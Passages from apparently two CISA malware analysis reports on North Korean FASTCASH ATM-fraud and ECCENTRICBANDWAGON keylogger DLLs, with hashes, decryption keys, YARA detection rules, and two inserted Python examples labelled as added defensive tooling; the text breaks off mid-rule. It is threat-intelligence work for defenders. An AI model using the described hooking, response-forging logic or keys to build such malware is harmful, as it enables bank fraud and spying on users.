C:\intel\_DMP_V\TMPR<PID>.tmp: Logs Received Messages
C:\intel\_DMP_V\TMPS<PID>.tmp: Logs Sent Messages
C:\intel\_DMP_V\TMPHSMS<PID>.tmp: Logs LocalHost ARQC sent messages
C:\intel\_DMP_V\TMPHSMR<PID>.tmp: Logs LocalHost ARQC received messages
C:\intel\_DMP_V\spvmscap.dat: Logs modified sent messages
C:\intel\_DMP_V\spvmsuc.dat: Logs modified sent messages metadata (encrypted)
–End files–
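The entry formats documented above are enough to triage these files once they are recovered from a compromised switch host. The following Python is an added example, not code from the report or from the sample: it parses spvmlog_<PID>.dat entries and the recv/send metadata entries of TMPL<PID>.dat, and summarises which peers the hooked process exchanged messages with. The sample lines are constructed; the only assumption beyond the report is that the dash between "recv"/"send" and "SOCK=" may appear as either a hyphen or an en dash.

```python
import re

# Layout of spvmlog_<PID>.dat entries: [<YYYY-MM-DD HH:MM:SS.sss>][PID:<PID>][TID:<TID>] <Message>
_LOG_RE = re.compile(
    r"^\[(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3})\]"
    r"\[PID:(?P<pid>\d+)\]\[TID:(?P<tid>\d+)\] (?P<msg>.*)$"
)

# Layout of TMPL<PID>.dat entries. recv entries carry pBuf=<data>; send entries do not.
# Assumption: the separator after recv/send is a hyphen or an en dash ("–").
_TMPL_RE = re.compile(
    r"^(?P<dir>recv|send) [-–] SOCK=(?P<sock>[^,]+), Addr=(?P<addr>[^,]+), "
    r"Port=(?P<port>\d+)(?:, pBuf=(?P<pbuf>.*?))?, size=(?P<size>\d+)$"
)


def parse_spvmlog_line(line):
    """Return a dict for one spvmlog entry, or None if the line does not match."""
    m = _LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    entry = m.groupdict()
    entry["pid"] = int(entry["pid"])
    entry["tid"] = int(entry["tid"])
    return entry


def parse_tmpl_line(line):
    """Return a dict for one TMPL recv/send metadata entry, or None if unmatched."""
    m = _TMPL_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    entry = m.groupdict()
    entry["port"] = int(entry["port"])
    entry["size"] = int(entry["size"])
    return entry


def summarize_tmpl(lines):
    """Group TMPL entries by peer (Addr, Port): message counts per direction and total bytes.

    This shows an analyst which hosts the hooked process was talking to on the
    port the sample watches, without needing the payload files themselves.
    """
    summary = {}
    for line in lines:
        entry = parse_tmpl_line(line)
        if entry is None:
            continue
        peer = (entry["addr"], entry["port"])
        stats = summary.setdefault(peer, {"recv": 0, "send": 0, "bytes": 0})
        stats[entry["dir"]] += 1
        stats["bytes"] += entry["size"]
    return summary


# Constructed sample lines in the documented formats (not from a real incident).
SAMPLE_SPVMLOG = [
    "[2018-07-03 08:12:01.001][PID:4212][TID:4216] attach: config loaded",
    "[2018-07-03 08:12:01.045][PID:4212][TID:4216] hook send/recv ok",
    "unrelated line that should be ignored",
]
SAMPLE_TMPL = [
    "recv - SOCK=0x1A4, Addr=10.0.0.5, Port=7029, pBuf=30323030373032303030, size=98",
    "send – SOCK=0x1A4, Addr=10.0.0.5, Port=7029, size=102",
    "recv - SOCK=0x1B0, Addr=10.0.0.9, Port=7029, pBuf=30323030, size=64",
]

if __name__ == "__main__":
    for line in SAMPLE_SPVMLOG:
        print(parse_spvmlog_line(line))
    for peer, stats in summarize_tmpl(SAMPLE_TMPL).items():
        print(peer, stats)
```

When run against recovered files, feed each file's lines to the matching parser; lines that do not match the documented layout are skipped rather than raising, since the files may be truncated or partially overwritten.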

Upon attaching to a process, the sample decrypts the encrypted configuration file and reads it into memory. Next, it hooks the process’s “send” and “recv” Windows API functions. When “send” is called, the hook checks whether the port is 7029; if so, it logs the data and metadata to the log files listed above, otherwise it passes the call through to “send” as the program normally would. When “recv” is called, the hook checks whether the port is 7029; if so, it waits for packets received from port 7029 and parses the following ISO8583 fields out of the incoming datagram:

–Begin fields–
MESSAGE_TYPE_INDICATOR (MTI)
PRIMARY_ACCOUNT_NUMBER (PAN)
PROCESSING_CODE
RESERVED_NATIONAL_3
–End fields–

Next, it checks the loaded configuration for the PAN. If the PAN is present, processing continues; otherwise the message is passed through. It then checks the blacklist file for the PAN: if the blacklist contains ‘all’ or the PAN, it sets the RESPONSE_CODE to 51 (Insufficient funds) in the response message. It looks for the following message types:

–Begin message types–
POS system message
ATM transaction request
ATM balance inquiry
–End message types–

Next, it constructs what appears to be an Authorization Request Cryptogram (ARQC) message:

–Begin format–
Uses the PRIMARY_ACCOUNT_NUMBER and ICC_DATA
Contains the hardcoded string: “U8BFE0AE12F9000C1480B297BE43CAC97”
Sends to localhost on port 9990
Parses the response Authorization Response Cryptogram (ARPC) message
–End format–

Finally, it constructs and sends an ISO8583 response message.
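Both FASTCASH samples above answer the ATM themselves once a configured PAN is seen, so the authorization host never receives the request that the ATM believes was approved. One way to surface that from logs is to reconcile the switch's request/response pairs against the upstream host's records. The following Python is an added example, not code from the report or from the samples: a minimal ASCII ISO 8583 encoder/decoder for the fields the report names (MTI, PAN in field 2, processing code in field 3, plus field 4, the STAN in field 11 and the response code in field 39) and a reconciliation check that flags approved responses with no matching upstream request. The sample messages are constructed; the use of response code "00" for approval and of (PAN, STAN) as the match key are standard ISO 8583 conventions, not something the report states.

```python
# Data elements used below (ISO 8583:1987, ASCII encoding, primary bitmap only).
# "llvar": two-digit length prefix up to the given max; "fixed": fixed width.
FIELD_SPEC = {
    2:  ("llvar", 19),   # primary account number (PAN)
    3:  ("fixed", 6),    # processing code
    4:  ("fixed", 12),   # transaction amount
    11: ("fixed", 6),    # system trace audit number (STAN)
    39: ("fixed", 2),    # response code ("51" = insufficient funds, as in the report)
}


def build_message(mti, fields):
    """Encode an MTI and {field_number: value} into an ASCII ISO 8583 message."""
    bitmap = 0
    body = []
    for num in sorted(fields):
        if num not in FIELD_SPEC:
            raise ValueError(f"no layout for field {num}")
        kind, width = FIELD_SPEC[num]
        value = str(fields[num])
        if kind == "llvar":
            if len(value) > width:
                raise ValueError(f"field {num} exceeds {width} characters")
            body.append(f"{len(value):02d}{value}")
        else:
            if len(value) != width:
                raise ValueError(f"field {num} must be exactly {width} characters")
            body.append(value)
        bitmap |= 1 << (64 - num)          # bit 1 is the MSB; field n is bit n
    return f"{mti}{bitmap:016X}{''.join(body)}"


def parse_message(msg):
    """Decode an ASCII ISO 8583 message into (mti, {field_number: value})."""
    mti = msg[:4]
    bitmap = int(msg[4:20], 16)
    if (bitmap >> 63) & 1:
        raise ValueError("secondary bitmap not supported in this example")
    pos = 20
    fields = {}
    for num in range(2, 65):
        if not (bitmap >> (64 - num)) & 1:
            continue
        if num not in FIELD_SPEC:
            raise ValueError(f"no layout for field {num}")
        kind, width = FIELD_SPEC[num]
        if kind == "llvar":
            length = int(msg[pos:pos + 2])
            pos += 2
            fields[num] = msg[pos:pos + length]
            pos += length
        else:
            fields[num] = msg[pos:pos + width]
            pos += width
    if pos != len(msg):
        raise ValueError("trailing data after the last field")
    return mti, fields


def unauthorized_approvals(switch_log, issuer_log):
    """Return STANs of approved responses (0210, field 39 == "00") seen at the switch
    for which the authorization host has no matching 0200 request (same PAN and STAN).
    A response fabricated inside the switch process leaves exactly this gap."""
    upstream = set()
    for raw in issuer_log:
        mti, f = parse_message(raw)
        if mti == "0200":
            upstream.add((f.get(2), f.get(11)))
    flagged = []
    for raw in switch_log:
        mti, f = parse_message(raw)
        if mti == "0210" and f.get(39) == "00" and (f.get(2), f.get(11)) not in upstream:
            flagged.append(f.get(11))
    return flagged


# Constructed sample traffic (test PANs, not real accounts). The second withdrawal
# was "approved" at the switch but never reached the authorization host.
SAMPLE_SWITCH_LOG = [
    build_message("0200", {2: "4111111111111111", 3: "010000", 4: "000000010000", 11: "000101"}),
    build_message("0210", {2: "4111111111111111", 3: "010000", 4: "000000010000", 11: "000101", 39: "00"}),
    build_message("0200", {2: "4111111111112222", 3: "010000", 4: "000000005000", 11: "000102"}),
    build_message("0210", {2: "4111111111112222", 3: "010000", 4: "000000005000", 11: "000102", 39: "00"}),
]
SAMPLE_ISSUER_LOG = [
    build_message("0200", {2: "4111111111111111", 3: "010000", 4: "000000010000", 11: "000101"}),
]

if __name__ == "__main__":
    print("switch approvals with no upstream request:", unauthorized_approvals(SAMPLE_SWITCH_LOG, SAMPLE_ISSUER_LOG))
```

Real deployments use vendor-specific field sets and often EBCDIC (the report notes the parser was adapted for IBM037 data), so the field table would need to be extended and the decoding adjusted; the reconciliation logic itself does not depend on those details.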

When detaching from the process, the sample unhooks the “send” and “recv” WINAPI functions, returning them to their normal state. It then overwrites the first 0x400 bytes of its in-memory DLL image in the process, effectively cleaning up any trace of the sample.

The sample frequently uses code that is taken from GitHub with a few modifications in some cases. The sample uses code that is taken from github.com/petewarden/c_hashmap to load the configuration file into memory in a hashmap, API hooking using Microsoft’s Detour library at github.com/Microsoft/Detours and the ISO8583 parsing code is taken from github.com/sabit/Oscar-ISO8583 (slightly modified to facilitate parsing of IBM037 formatted data).

The encryption that is used for all log/config files is likely an AES variant with the following keys:

–Begin keys–
zRuaDglxjec^tDtt
Slsklqc^mNgq`lyz
–End keys–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 26, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 26, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified Remote Access Tool (RAT) malware variants used by the North Korean government. This malware variant has been identified as ECCENTRICBANDWAGON. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This report looks at malware samples known as ECCENTRICBANDWAGON. This family of malware is used as a reconnaissance tool. The samples in this report are used for keylogging and screen capture functionality. The samples are very similar, but differ slightly in the location that they store the key logs and screenshots. Some variants have RC4 encrypted strings within the executable and conduct a simple, ineffective cleanup, whereas others do not.

For a downloadable copy of IOCs, see [STIX file].

Submitted Files (4)

32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8 (PSLogger .dll)

9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e (PSLogger .dll)

c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec (PSLogger .dll)

efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e (PSLogger .dll)

Findings

efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e

Tags

HIDDEN-COBRA, backdoor, keylogger, reconnaissance, screen-capture, spyware, trojan

Details
Name PSLogger .dll
Size 138240 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 d45931632ed9e11476325189ccb6b530
SHA1 081d5bd155916f8a7236c1ea2148513c0c2c9a33
SHA256 efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e
SHA512 fd1b7ea95f66a660e9183c22755ac7d741823ba45a009bf9929546213308f89fd9ce8fcc2e70b56e427f0daa1b0965817d45dd9c2f5598404bc79c50afc2f818
ssdeep 3072:t+N02CVLOJdCPQhVNRTzcb/YrgHdnG6ioaa5IR:sO2qO3CPkRTz8YrgHdGBoa1
Entropy 6.096739
Antivirus
Ahnlab Trojan/Win64.Agent
Antiy Trojan[Spy]/Win64.Agent
Avira TR/Spy.Agent.ftmjo
BitDefender Trojan.GenericKD.40337042
Cyren W64/Trojan.WFEO-4014
ESET a variant of Win64/Spy.Agent.AP trojan
Emsisoft Trojan.GenericKD.40337042 (B)
Filseclab W64.Spy.Agent.AP.feaw
Ikarus Trojan-Spy.Win64.Agent
K7 Spyware ( 00538f7c1 )
Lavasoft Trojan.GenericKD.40337042
McAfee RDN/Generic PWS.nq
Microsoft Security Essentials Trojan:Win32/Tiggre!plock
NANOAV Trojan.Win64.Mlw.fgbvfi
NetGate Trojan.Win32.Malware
Sophos Troj/Spy-AUK
Symantec Trojan.Crobaruko
Systweak malware.agent
TrendMicro TSPY64_.F7315F7E
TrendMicro House Call TSPY64_.F7315F7E
Vir.IT eXplorer Backdoor.Win32.Lazarus.BGM
VirusBlokAda TrojanSpy.Win64.Agent
Zillya! Trojan.Agent.Win64.2215
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = "CISA Trusted Third Party"
           Incident = "10301706.r1.v1"
           Date = "2020-08-11"
           Actor = "Hidden Cobra"
           Category = "Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan"
           Family = "ECCENTRICBANDWAGON"
           Description = "Detects strings in ECCENTRICBANDWAGON proxy tool"
           MD5_1 = "d45931632ed9e11476325189ccb6b530"
           SHA256_1 = "efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e"
           MD5_2 = "acd15f4393e96fe5eb920727dc083aed"
           SHA256_2 = "32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8"
           MD5_3 = "34404a3fb9804977c6ab86cb991fb130"
           SHA256_3 = "c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec"
           MD5_4 = "3122b0130f5135b6f76fca99609d5cbe"
           SHA256_4 = "9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e"
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = "%s\\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d" wide ascii nocase
           $sn5 = "c:\\windows\\temp\\TMP0389A.tmp" wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches
100 32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8
PE Metadata
Compile Date 2018-04-27 22:53:06-04:00
Import Hash f0faa229b086ea5053b4268855f0c8ba
PE Sections
MD5 Name Raw Size Entropy
09745305cbad67b17346f0f6dba1e700 header 1024 2.729080
5c2242b56a31d64b6ce82671d97a82a4 .text 92160 6.415763
0d022eff24bc601d97d2088b4179bd18 .rdata 31232 4.934652
578e5078ccb878f1aa9e309b4cfc2be5 .data 6144 2.115729
09924946b47ef078f7e9af4f4fcb59dc .pdata 5632 4.803615
7ead0113095bc6cb3b2d82f05fda25f3 .rsrc 512 5.115767
7937397e0a31cdc87f5b79074825e18e .reloc 1536 2.931043
Description

This file is a 64-bit dynamic link library (DLL). The malware uses three files to store the key logs, screenshots, and log intervals. The location of these logs can be found in C:\windows\temp\TMP0389A.tmp.

–Begin Log Files–
1. Keylog: %temp%GoogleChromechromeupdate_pk
2. Screenshots: %temp%GoogleChromechromeupdate_ps_<YYYMMDD>_<HHMMSS>_<sss>_<ThreadID>
3. Log intervals: C:ProgramData2.dat
–End Log Files–

The malware creates three threads to populate the log files listed above. Each one continues to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads return and the program exits.

32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8

Tags

HIDDEN-COBRA, backdoor, keylogger, reconnaissance, screen-capture, spyware, trojan

Details
Name PSLogger .dll
Size 138243 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 acd15f4393e96fe5eb920727dc083aed
SHA1 c92529097cad8996f3a3c8eb34b56273c29bdce5
SHA256 32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8
SHA512 82a946c2d0c9fffdd23d8e6b34028ac1b0368d4fd78302268aa4d954bead8a82ea15873a28d69946dceaf80fcafd0c52aeb59f47df5a029f77072fa1bc8e0fae
ssdeep 3072:t+N02CVLOJdCPQhVNRTzcb/YrgHdnG6ioaa5IR:sO2qO3CPkRTz8YrgHdGBoa1
Entropy 6.096652
Antivirus
Ahnlab Trojan/Win64.Agent
Antiy Trojan[Spy]/Win64.Agent
Avira TR/Spy.Agent.ftmjo
BitDefender Trojan.GenericKD.40337042
Comodo Malware
Cyren W64/Trojan.WFEO-4014
ESET a variant of Win64/Spy.Agent.AP trojan
Emsisoft Trojan.GenericKD.40337042 (B)
Ikarus Trojan-Spy.Win64.Agent
K7 Spyware ( 00538f7c1 )
Lavasoft Trojan.GenericKD.40337042
Microsoft Security Essentials Trojan:Win32/Tiggre!plock
NANOAV Trojan.Win64.Mlw.fgbtfv
Symantec Trojan.Crobaruko
Systweak malware.agent
Vir.IT eXplorer Backdoor.Win32.Lazarus.BGM
VirusBlokAda TrojanSpy.Win64.Agent
Zillya! Trojan.Agent.Win64.2215
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = "CISA Trusted Third Party"
           Incident = "10301706.r1.v1"
           Date = "2020-08-11"
           Actor = "Hidden Cobra"
           Category = "Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan"
           Family = "ECCENTRICBANDWAGON"
           Description = "Detects strings in ECCENTRICBANDWAGON proxy tool"
           MD5_1 = "d45931632ed9e11476325189ccb6b530"
           SHA256_1 = "efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e"
           MD5_2 = "acd15f4393e96fe5eb920727dc083aed"
           SHA256_2 = "32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8"
           MD5_3 = "34404a3fb9804977c6ab86cb991fb130"
           SHA256_3 = "c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec"
           MD5_4 = "3122b0130f5135b6f76fca99609d5cbe"
           SHA256_4 = "9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e"
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = "%s\\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d" wide ascii nocase
           $sn5 = "c:\\windows\\temp\\TMP0389A.tmp" wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches
100 efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e
PE Metadata
Compile Date 2018-04-27 22:53:06-04:00
Import Hash f0faa229b086ea5053b4268855f0c8ba
PE Sections
MD5 Name Raw Size Entropy
09745305cbad67b17346f0f6dba1e700 header 1024 2.729080
5c2242b56a31d64b6ce82671d97a82a4 .text 92160 6.415763
0d022eff24bc601d97d2088b4179bd18 .rdata 31232 4.934652
578e5078ccb878f1aa9e309b4cfc2be5 .data 6144 2.115729
09924946b47ef078f7e9af4f4fcb59dc .pdata 5632 4.803615
7ead0113095bc6cb3b2d82f05fda25f3 .rsrc 512 5.115767
7937397e0a31cdc87f5b79074825e18e .reloc 1536 2.931043
Description

This file is a 64-bit DLL. This sample and “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e” are nearly identical, the only difference being that this sample has three extra NULL bytes at the end of the file.

The malware uses three files to store the key logs, screenshots, and log intervals. The location of these logs can be found in C:\windows\temp\TMP0389A.tmp.

–Begin Log Files–
1. Keylog: %temp%GoogleChromechromeupdate_pk
2. Screenshots: %temp%GoogleChromechromeupdate_ps_<YYYMMDD>_<HHMMSS>_<sss>_<ThreadID>
3. Log intervals: C:ProgramData2.dat
–End Log Files–

The malware creates three threads to populate the log files listed above. Each one continues to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads return and the program exits.

c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec

Tags

HIDDEN-COBRA, backdoor, keylogger, reconnaissance, screen-capture, trojan

Details
Name PSLogger .dll
Size 175104 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 34404a3fb9804977c6ab86cb991fb130
SHA1 b345e6fae155bfaf79c67b38cf488bb17d5be56d
SHA256 c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec
SHA512 01a8c8b66f6895387c6a347d02d00ea09619888f2727096a19d4c4ff50e6bf72367cbd41f09e89a57f7f3862efbb2db8177dbec086c4ce2aca3518d124575033
ssdeep 3072:AeO51bvWZElWhKQGhvNdx2GYZj+utNfBtZl7mGwwZWyNGVxBqu:A77beClWhKQG36UutNfB077Bqu
Entropy 6.491987
Antivirus
Ahnlab Malware/Gen.Generic
Antiy GrayWare/Win32.Presenoker
BitDefender Trojan.GenericKD.43188225
Cyren W32/Trojan.MZDN-2436
ESET a variant of Generik.HKZTFCG trojan
Emsisoft Trojan.GenericKD.43188225 (B)
Ikarus Trojan.SuspectCRC
K7 Trojan ( 005506c81 )
Lavasoft Trojan.GenericKD.43188225
NANOAV Trojan.Win32.KeyLogger.fnwztc
NetGate Malware.Generic
Symantec Hacktool.Keylogger
Vir.IT eXplorer Backdoor.Win32.Lazarus.BGM
VirusBlokAda TrojanSpy.Keylogger
Zillya! Trojan.Keylogger.Win32.9
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = "CISA Trusted Third Party"
           Incident = "10301706.r1.v1"
           Date = "2020-08-11"
           Actor = "Hidden Cobra"
           Category = "Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan"
           Family = "ECCENTRICBANDWAGON"
           Description = "Detects strings in ECCENTRICBANDWAGON proxy tool"
           MD5_1 = "d45931632ed9e11476325189ccb6b530"
           SHA256_1 = "efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e"
           MD5_2 = "acd15f4393e96fe5eb920727dc083aed"
           SHA256_2 = "32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8"
           MD5_3 = "34404a3fb9804977c6ab86cb991fb130"
           SHA256_3 = "c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec"
           MD5_4 = "3122b0130f5135b6f76fca99609d5cbe"
           SHA256_4 = "9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e"
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = "%s\\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d" wide ascii nocase
           $sn5 = "c:\\windows\\temp\\TMP0389A.tmp" wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-11-14 09:44:18-05:00
Import Hash a8623b2da60776df129ebe0430d48d85
PE Sections
MD5 Name Raw Size Entropy
37ecb293f01edad89fcee1ce48e4cde3 header 1024 2.949326
36fd9d805b7c591ab71eda922662e30a .text 124928 6.650973
1d3132305f18961b86c1fda0a2f4eea9 .rdata 38912 5.166660
9e17ac76df46fd523a11378398cf026f .data 3072 2.367308
bbee55723eaad8c7f73a5fa9bf2159d4 .gfids 512 2.275750
264e317304c9b21a342169b33c0a791a .rsrc 512 4.717679
a1ab3dce319437b49198eeff43f4d847 .reloc 6144 6.422499
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This sample is nearly identical to “efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e” with the exception that this sample will RC4 encrypt some of its strings and use different log files.

The following strings are RC4 encrypted with the key “key”:

–Begin RC4 encrypted strings–
Downloads
c:\windows\temp\TMP0389A.tmp
c:\windows\temp\tmp1105.tmp
[CLIPBOARD]
[/CLIPBOARD]
–End RC4 encrypted strings–

The malware uses three files to store the key logs, screenshots, and log intervals. The location of these logs can be found in C:\windows\temp\TMP0389A.tmp.

–Begin log files–
1. Keylog: %temp%\Downloads\tmp_<USERNAME>
2. Screenshots: %temp%\Downloads\tmp_<USERNAME>_<MMDD>_<HHMMSS>
3. Log intervals: c:\windows\temp\tmp1105.tmp
–End log files–

The malware creates three threads to populate the log files listed above. Each one continues to execute until a global kill variable is set to 1. This variable can only be set to 1 by calling an export called “Process” from within this DLL. When the export is called, the threads return and the program exits.

9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e

Tags

HIDDEN-COBRA, keylogger, reconnaissance, screen-capture, spyware, trojan

Details
Name PSLogger .dll
Size 210944 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 3122b0130f5135b6f76fca99609d5cbe
SHA1 ce6bc34b887d60f6d416a05d5346504c54cff030
SHA256 9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e
SHA512 788c666efeb664c7691a958d15eac2b80d3d17241f5e7c131e5dec2f761bcb70950018c1f8a85fd6600eff0d0fab0ce31fbcd364d16b6ef8b54deb5e9c215f08
ssdeep 3072:6usGRlrmZ8LP/LqdmpWOY9Y9EbyBFWnqD5W3P4Tp31oItN7W0rVu6eRDP/fJkkj7:67GTjOdCWOKXbyCnCEQTp2CE0/gh2W
Entropy 6.246368
Antivirus
Ahnlab Trojan/Win64.Redbanc
Antiy Trojan[Banker]/Win32.Alreay
Avira TR/Spy.Agent.kdvkr
BitDefender Trojan.GenericKD.41368668
ESET a variant of Win64/Spy.Agent.BG trojan
Emsisoft Trojan.GenericKD.41368668 (B)
Ikarus Trojan-Spy.Keylogger.Lazarus
K7 Spyware ( 005501401 )
Lavasoft Trojan.GenericKD.41368668
McAfee RDN/Generic PWS.tf
NANOAV Trojan.Win64.Alreay.hoqvyj
Quick Heal Trojan.Alreay
Sophos Troj/Alreay-A
TACHYON Unknown-Type/Alreay.210944
Zillya! Trojan.Alreay.Win32.91
YARA Rules
  • rule CISA_3P_10301706_01 : HiddenCobra ECCENTRICBANDWAGON backdoor keylogger reconnaissance screencapture spyware trojan
    {
       meta:
           Author = "CISA Trusted Third Party"
           Incident = "10301706.r1.v1"
           Date = "2020-08-11"
           Actor = "Hidden Cobra"
